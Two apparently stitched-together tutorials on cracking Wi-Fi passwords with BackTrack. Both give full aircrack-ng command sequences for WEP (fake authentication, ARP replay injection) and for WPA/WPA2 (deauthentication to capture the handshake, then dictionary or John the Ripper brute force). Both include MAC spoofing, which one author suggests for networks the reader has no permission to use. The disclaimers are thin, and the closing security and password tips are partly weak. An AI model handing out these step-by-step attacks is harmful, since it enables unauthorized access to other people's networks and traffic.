How to Crack a Wi-Fi Networks WEP Password with BackTrack

You already know that if you want to lock down your Wi-Fi network, you should opt for WPA encryption because WEP is easy to crack. But did you know how easy? Take a look. Note: This post demonstrates how to crack WEP passwords, an older and less often used network security protocol. If the network you want to crack is using the more popular WPA encryption, see our guide to cracking a Wi-Fi network's WPA password with Reaver instead. Today we're going to run down, step-by-step, how to crack a Wi-Fi network with WEP security turned on. But first, a word: Knowledge is power, but power doesn't mean you should be a jerk, or do anything illegal. Knowing how to pick a lock doesn't make you a thief. Consider this post educational, or a proof-of-concept intellectual exercise. Dozens of tutorials on how to crack WEP are already all over the internet using this method. SeriouslyGoogle it. This ain't what you'd call "news." But what is surprising is that someone like me, with minimal networking experience, can get this done with free software and a cheap Wi-Fi adapter. Here's how it goes.

What You'll Need

Unless you're a computer security and networking ninja, chances are you don't have all the tools on hand to get this job done. Here's what you'll need:

A compatible wireless adapterThis is the biggest requirement. You'll need a wireless adapter that's capable of packet injection, and chances are the one in your computer is not. After consulting with my friendly neighborhood security expert, I purchased an Alfa AWUS050NH USB adapter, pictured here, and it set me back about $50 on Amazon. Update: Don't do what I did. Get the Alfa AWUS036H, not the US050NH, instead. The guy in this video below is using a $12 model he bought on Ebay (and is even selling his router of choice). There are plenty of resources on getting aircrack-compatible adapters out there. A BackTrack Live CD. We already took you on a full screenshot tour of how to install and use BackTrack 3, the Linux Live CD that lets you do all sorts of security testing and tasks. Download yourself a copy of the CD and burn it, or load it up in VMware to get started. A nearby WEP-enabled Wi-Fi network. The signal should be strong and ideally people are using it, connecting and disconnecting their devices from it. The more use it gets while you collect the data you need to run your crack, the better your chances of success.

Patience with the command line. This is an ten-step process that requires typing in long, arcane commands and waiting around for your Wi-Fi card to collect data in order to crack the password. Like the doctor said to the short person, be a little patient.

Crack That WEP

To crack WEP, you'll need to launch Konsole, BackTrack's built-in command line. It's right there on the taskbar in the lower left corner, second button to the right. Now, the commands. First run the following to get a list of your network interfaces:
airmon-ng

The only one I've got there is labeled ra0. Yours may be different; take note of the label and write it down. From here on in, substitute it in everywhere a command includes (interface). Now, run the following four commands. See the output that I got for them in the screenshot below.
airmon-ng stop (interface) ifconfig (interface) down macchanger --mac 00:11:22:33:44:55 (interface) airmon-ng start (interface)

If you don't get the same results from these commands as pictured here, most likely your network adapter won't work with this particular crack. If you do, you've successfully "faked" a new MAC address on your network interface, 00:11:22:33:44:55. Now it's time to pick your network. Run:

airodump-ng (interface)

To see a list of wireless networks around you. When you see the one you want, hit Ctrl+C to stop the list. Highlight the row pertaining to the network of interest, and take note of two things: its BSSID and its channel (in the column labeled CH), as pictured below. Obviously the network you want to crack should have WEP encryption (in the ENC) column, not WPA or anything else.

Like I said, hit Ctrl+C to stop this listing. (I had to do this once or twice to find the network I was looking for.) Once you've got it, highlight the BSSID and copy it to your clipboard for reuse in the upcoming commands. Now we're going to watch what's going on with that network you chose and capture that information to a file. Run:
airodump-ng -c (channel) -w (file name) --bssid (bssid) (interface)

Where (channel) is your network's channel, and (bssid) is the BSSID you just copied to clipboard. You can use the Shift+Insert key combination to paste it into the command. Enter anything descriptive for (file name). I chose "yoyo," which is the network's name I'm cracking.

You'll get output like what's in the window in the background pictured below. Leave that one be. Open a new Konsole window in the foreground, and enter this command:
aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) (interface)

Here the ESSID is the access point's SSID name, which in my case is yoyo. What you want to get after this command is the reassuring "Association successful" message with that smiley face.

You're almost there. Now it's time for:

aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (interface)

Here we're creating router traffic to capture more throughput faster to speed up our crack. After a few minutes, that front window will start going crazy with read/write packets. (Also, I was unable to surf the web with the yoyo network on a separate computer while this was going on.) Here's the part where you might have to grab yourself a cup of coffee or take a walk. Basically you want to wait until enough data has been collected to run your

crack. Watch the number in the "#Data" columnyou want it to go above 10,000. (Pictured below it's only at 854.) Depending on the power of your network (mine is inexplicably low at -32 in that screenshot, even though the yoyo AP was in the same room as my adapter), this process could take some time. Wait until that #Data goes over 10k, thoughbecause the crack won't work if it doesn't. In fact, you may need more than 10k, though that seems to be a working threshold for many.

Once you've collected enough data, it's the moment of truth. Launch a third Konsole window and run the following to crack that data you've collected:
aircrack-ng -b (bssid) (file name-01.cap)

Here the filename should be whatever you entered above for (file name). You can browse to your Home directory to see it; it's the one with .cap as the extension. If you didn't get enough data, aircrack will fail and tell you to try again with more. If it succeeds, it will look like this: Full size

The WEP key appears next to "KEY FOUND." Drop the colons and enter it to log onto the network.

Problems Along the Way

With this article I set out to prove that cracking WEP is a relatively "easy" process for someone determined and willing to get the hardware and software going. I still think that's true, but unlike the guy in the video below, I had several difficulties along the way. In fact, you'll notice that the last screenshot up there doesn't look like the othersit's because it's not mine. Even though the AP which I was cracking was my own and in the same room as my Alfa, the power reading on the signal was always around -30, and so the data collection was very slow, and BackTrack would consistently crash before it was complete. After about half a dozen attempts (and trying BackTrack on both my Mac and PC, as a live CD and a virtual machine), I still haven't captured enough data for aircrack to decrypt the key. So while this process is easy in theory, your mileage may vary depending on your hardware, proximity to the AP point, and the way the planets are aligned. Oh yeah, and if you're on deadlineMurphy's Law almost guarantees it won't work if you're on deadline.

This guide is meant to show how easy it is to hack wireless networks if the proper security measures are not in place. First I will show how to hack a WEP or WPA/WPA2 Network and then I will give tips on how to avoid getting hacked. This is important information in our techno-savy culture. If your wireless network is compromised you can be liable for any illegal activity on it. There are numerous stories of child pornographers and black-hat hackers using other peoples wireless networks. NOTE: Hacking your neighbors or anyone else's Wifi without their permission is ILLEGAL. Be smart!

Step 1What you Need

i -A Computer. (A Laptop works best) -A Wireless Card capable of packet injection. -If your laptop wireless card can't do packet injection you can purchase a wireless adapter such as the Netgear WG111 v2 for around $8-$12 on eBay. -A Live installation of BackTrack either on a CD or USB stick. -BackTrack 5 Can be found Here -Create a Live USB Install Here

Step 2Hack WEP

i WEP is the predecessor of WPA and has been hacked for the past 5+ years yet people continue to use it. With the instructions below we can crack WEP in under 15 minutes. You can crack WEP from the command line but there is an easy GUI interface in backtrack which makes it a much less painful experience for those who are scared of command prompts. 1. Boot into BackTrack 2. Click on the Backtrack applications menu -> Backtrack -> Exploitation tools -> Wireless exploitation -> WLAN Exploitation -> gerix-wifi-cracker-ng (This will open up the GUI interface seen in the picture). 3. Go to the configuration menu and select the wireless interface wlan0 -Click on Enable/Disable Monitor Mode (this will put the wireless card into monitor mode). -Select the newly created mon0 interface. 4. Now click on the WEP tab at the top of the window.

-Click on "Start sniffing and logging" and leave the terminal open. -Once the wireless network you want to crack* shows up (it has to be WEP encryption of course) select the WEP Attacks (with clients). *note that the PWR has to be high enough to work so the closer you can get, the better. -There you click on Associate with AP using fake auth, wait a few seconds and click on ARP request replay. 5. Once the Data number reaches over 10,000 you are ready to try (if the data is coming fast wait until 20 or 30,000 to be safe) and crack the key, but don't close any windows yet. -Go to the cracking tab and click on Aircrack-ng Decrypt WEP password under Wep Cracking. It will take a few seconds to minutes to crack the password and then you are good to go.

Step 3Hack WPA/WPA2

i At least WPA and WPA2 are safe right? Wrong. WPA and WPA2 are both crackable but the time it takes to crack depends on the strength of their password. -Boot into BackTrack -Open up Konsole which is a command line utility built into BackTrack. It is the Black Box in the Lower-Left Hand Corner (See Image). We will now be entering the following commands into the command line noted by Bold as well as explanations as to what they do: -The following commands stop the wireless interface so you can change your mac address, this is important because your mac address is a unique identifier so faking one is a good

idea if you are accessing a network you don't have permission to. (which by the way I wholly condemn) 1: airmon-ng stop wlan0 ifconfig wlan0 down macchanger --mac 00:11:22:33:44:55 wlan0 airmon-ng start wlan0 2: -Now we will put the airodump-ng tool into monitor mode, this will allow us to see all of the wireless networks around us (See the first Picture). airodump-ng mon0 Now choose the network you want to hack and take note of the BSSID, and the Channel it is one as well as the ESSID. The PWR has to be fairly high to be able to hack it, this is determined by how close you are to the wireless router. The closer you are, the better. Once you have chosen the wireless network enter the following into the terminal: This will write capture packets and put them into the "filename" file, we are trying to capture the handshake between the router and wireless connection which will give us the key we need to crack. 3: airodump-ng mon0 --channel * --bssid **:**:**:**:**:** -w filename The following step is optional but is highly recommended as it will speed up the process a great deal. Once WPA handshake: **:**:**:**:**:** appears in the top right-hand corner we can move on. If you are having trouble getting the WPA handshake to occur then do step 4. 4: aireplay-ng -0 1 -a **:**:**:**:**:** -c **:**:**:**:**:** mon0 What this step (4) does is it deauthorizes a wireless connection and trie to re-establish it so it will generate a new handshake to capture. This step ends once you have captured the handshake. 5: aircrack-ng w wordlist.lst -b **:**:**:**:**:** filename.cap Step 5 is now trying to crack the password in "filename.cap" using a list of words, here called "wordlist.lst" you can download a good 200 million word dictionary here (128MB

but unzipped is 800MB). Your computer has to compute the hash value of every password in that list but a computer can go through those 200 million passwords in 6-12 hours. 6. If the password isn't found in the dictionary you can try and brute-force the password with this command: (Note this could take a very long time depending on their password strength). /pentest/password/jtr/john --stdout --incremental:all | aircrack-ng -b **:**:**:**:**:** -w - filename.cap

Step 4Secure Your Own Wireless Network

i Hopefully you gained some insight into how to not get your own wireless connection hacked: 1. Use WPA2 (WPA2-AES) if available and by all means never use WEP. 2. Don't base your password on a dictionary word. The next section focuses on passwords in general. 3. In your router settings you can usually hide your ESSID (the name of the wireless network) this will add a small layer of security. 4. In your router there is probably a mac-address filtering service where you can specify the

mac addresses that are allowed to connect. This will make sure that only your approved devices can connect to your network. (obviously a problem though if you have a guest over and wants to connect to your Wifi).

Step 5Passwords

i You have to have good passwords in this day and age. If not your credit card information, your personal information and identity are available to those who want to use it and abuse it. Here are some guidelines to coming up with a secure password: 1. At least 8 characters. 2. At least one number, letter and special character ie: $ # % ^ @ ! 3. NOT based on a dictionary word 4. Multiple transitions: ie: aaa111aaa111 not aaaa11111. How can I remember these passwords? Come up with a word such as: calculus and substitute numbers and other characters for letters ie: c@1cu1u$ This is still based on a dictionary word though so you should still make it harder such as appending something to the end or beginning. I also highly recommend using a different password for every website, how can you do this easily? Remember random variables in algebra? Have a random variable in your password that is based on the website or some other information. IE: XpasswordY where the first X is the last letter of the website name and the last Y is the first letter of the website name: So the Instructables website password would be SpasswordI or your Facebook password

would be KpasswordF and your Hotmail password will be LpasswordH. It might seem like a lot but it's worth the time to prevent the potential theft of your money, identity and your life ruined.